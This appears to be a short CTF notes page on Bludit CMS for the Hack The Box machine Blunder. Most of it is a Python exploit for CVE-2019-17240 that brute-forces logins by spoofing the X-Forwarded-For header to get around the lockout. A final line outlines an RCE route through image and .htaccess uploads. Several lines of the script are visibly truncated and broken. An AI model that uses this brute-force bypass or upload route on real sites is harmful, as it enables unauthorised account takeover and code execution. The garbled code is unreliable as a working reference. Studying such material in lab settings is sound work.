Bludit is a CMS that has some technical issues in its earlier versions. A Bruteforce exploit is available for the CMS which allows the attacker to enumerate the user and its potential password to the CMS. And RCE is available with version 3.9.x. Both of them are featured in the Blunder from HTB

Login Bruteforce


# Exploit
## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
## Author: ColdFusionX (Mayank Deshmukh)
## Author website:
## Date: 2020-10-19
## Vendor Homepage:
## Software Link:
## Version: <= 3.9.2

# Vulnerability
## Discoverer: Rastating
## Discoverer website:
## CVE: CVE-2019-17240
## References:
## Patch:

Example Usage:
- ./ -l -u user.txt -p pass.txt

import requests
import sys
import re
import argparse, textwrap
from pwn import *

#Expected Arguments
parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
Exploit Usage :
./ -l -u user.txt -p pass.txt
./ -l -u /Directory/user.txt -p /Directory/pass.txt'''))

parser.add_argument("-l","--url", help="Path to Bludit (Example:")
parser.add_argument("-u","--userlist", help="Username Dictionary")
parser.add_argument("-p","--passlist", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print (f"Exploit Usage: ./ -h [help] -l [url] -u [user.txt] -p [pass.txt]")

# Variable
LoginPage = args.url
Username_list = args.userlist
Password_list = args.passlist'Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')

def login(Username,Password):
    session = requests.session()
    r = session.get(LoginPage)

# Progress Check
    process = log.progress('Brute Force')

#Getting CSRF token value
    CSRF ='input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
    CSRF =

#Specifying Headers Value
    headerscontent = {
    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Referer' : f"{LoginPage}",
    'X-Forwarded-For' : f"{Password}"

#POST REQ data
    postreqcontent = {
    'tokenCSRF' : f"{CSRF}",
    'username' : f"{Username}",
    'password' : f"{Password}"

#Sending POST REQ
    r =, data = postreqcontent, headers = headerscontent, allow_redirects= False)

#Printing Username:Password
    process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))

#Conditional loops
    if 'Location' in r.headers:
        if "/admin/dashboard" in r.headers['Location']:
  'SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
    elif "has been blocked" in r.text:
        log.failure(f"{Password} - Word BLOCKED")

#Reading User.txt & Pass.txt files
userfile = open(Username_list).readlines()
for Username in userfile:
    Username = Username.strip()

passfile = open(Password_list).readlines()
for Password in passfile:
    Password = Password.strip()



Upload the image file, change the UUID and upload a .htaccess file

Machine : Blunder -

Last updated